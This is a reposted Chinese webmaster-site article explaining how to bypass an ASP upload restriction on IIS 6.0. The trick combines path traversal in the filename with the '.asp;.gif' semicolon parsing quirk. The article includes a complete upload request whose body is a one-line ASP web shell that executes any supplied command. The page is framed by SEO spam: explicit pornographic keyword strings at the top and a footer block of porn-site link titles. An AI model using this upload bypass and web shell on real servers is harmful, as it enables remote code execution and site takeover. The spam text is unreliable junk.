青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

upfile asp文件上傳,又一奇跡般的突破

2022-9-26 14:44| 查看: 2024 |來源: 互聯網

然而。上傳目錄取消了腳本執行的權限。 我想這里估計大家都要放棄了。 如何突破呢?其實是可以的. 關鍵是 [不修改名字] 先來看看一個上傳的數據包: POST /fa-bu/upload/upfile1.asp HTTP/1.1 Accept: application/x-s
然而。上傳目錄取消了腳本執行的權限。 我想這里估計大家都要放棄了。
如何突破呢?其實是可以的. 關鍵是 [不修改名字]
先來看看一個上傳的數據包:

POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name="act"
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"
Content-Type: text/plain
<%execute(request("cmd"))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name="Submit"
up
-----------------------------7da290150c5e--
關鍵是 :

Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"

我首先呢。 filename他是如何判斷 那個開始就是文件名呢? 他是判斷filename里的最右邊的一個"\"以后的就是文件名字了。

大家因該知道。 在windows下 "\" 和 "/" 是不分家的。

假設上傳之后的目錄為upload/

然后一個可以執行可以寫的目錄為 okokok/

那么我們只要構造

Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"

那么我們上傳的文件就成功的傳進去了 okokok/111.asp;.gif了。

突破之!

PS: win+iis6.0測試成功。
本文最后更新于 2022-9-26 14:44,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 亚洲欧美一级久久精品 | 国产成人综合视频 | 女子初尝黑人巨嗷嗷叫 | 国产成人在线视频网站 | 无码天堂亚洲内射精品课堂 | 精品丰满人妻无套内射 | 火影小南被爆羞羞网站 | 少妇的肉体AA片免费观看 | 日韩一级精品久久久久 | 国产不卡一卡2卡三卡4卡网站 | 九九热在线免费观看 | 99re久久热最新地址一 | 国产91青青成人a在线 | 免费视频亚洲 | 色综合99久久久国产AV | 肉奴隷 赤坂丽在线播放 | 小776 论坛 | 热综合一本伊人久久精品 | 国产三区在线成人AV | 国产免费69成人精品视频 | 久久免费高清 | 英国video性精品高清最新 | 国产成人一区二区三中文 | 春药按摩人妻中文字幕 | 小箩莉奶水四溅小说 | 超碰人人草在线视频 | 国产精品久久久久久久久免费下载 | 久久久久久久久人体 | 亚洲伊人色综合久久天天伊人 | 国产成人综合网在线观看 | 久久精品亚洲AV高清网站性色 | 亚洲欧美国产双大乳头 | 日本久久久 | 97午夜理论片影院在线播放 | 亚洲成人免费在线观看 | a毛片基地免费全部视频 | 顶级少妇AAAAABBBBB片 | 2020最新无码国产在线视频 | 国产毛片A级久久久不卡精品 | 黄色三级网站在线观看 | 欧美日韩亚洲成人 |